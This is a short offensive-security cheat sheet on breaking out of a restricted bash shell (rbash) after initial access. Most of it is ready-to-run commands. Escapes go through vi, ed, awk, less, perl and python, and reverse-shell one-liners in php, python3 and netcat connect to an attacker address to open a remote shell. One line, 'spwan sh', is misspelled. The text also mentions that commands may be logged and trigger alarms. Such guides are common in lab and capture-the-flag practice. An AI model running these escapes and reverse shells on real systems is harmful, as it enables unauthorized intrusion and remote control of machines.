Overview
When performing host enumeration after gaining initial access, echo $SHELL may return /bin/rbash. This is a special shell that further restricts a standard user from executing commands.
Common restrictions are:
- preventing write access to environment variables like $SHELL or $ENV
- blocking special characters such as
/>& - restriction of commands such as
cd,exec,ftp,scp- this is easily identifiable when you try a command and get
command not found
- this is easily identifiable when you try a command and get
Escaping
Escaping rbash to gain a standard shell depends on what tools are actually available. There are cases where the shell is sufficiently locked down and an RCE vulnerability will need to be identified to properly pop a standard shell.
Try swapping between different flavors of /bin/bash, bash, /bin/sh, sh and so on when attempting these. Note that these can still be saved to history and trigger an alarm on higher security systems.
# if ssh creds are available, you can try to bypass on login
ssh [email protected] -t "/bin/bash --noprofile"
# reveal what binaries we have access to
compgen -b
# might also find binaries under
ls ~/bin
# view environment variables
export -p
# these next commands can only be ran if it's available from compgen or ~/bin,
# otherwise you will get a restricted error
# if vi available:
vi
:set shell=/bin/bash
:shell
# if ed available:
ed
!'/bin/bash'
# if awk available:
awk 'BEGIN {system("/bin/bash")}'
# if expect is available
expect
spwan sh
# if less, more or man is available (try with any of those 3)
less file.txt
!'bash'
# if perl available:
perl -e 'system("/bin/bash");'
# if python available
python3 -c 'import os; os.system("/bin/bash");'
# if sh available
sh
# these are reverse shells, ensure a listener is started on attacker machine
# if php available:
php -r '$sock=fsockopen("10.10.10.10",4444);shell_exec("/bin/bash <&3 >&3 2>&3");'
# if python/python3 available:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.10.10",4440));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
# if nc available
nc 10.10.10.10 4444 -e /bin/bash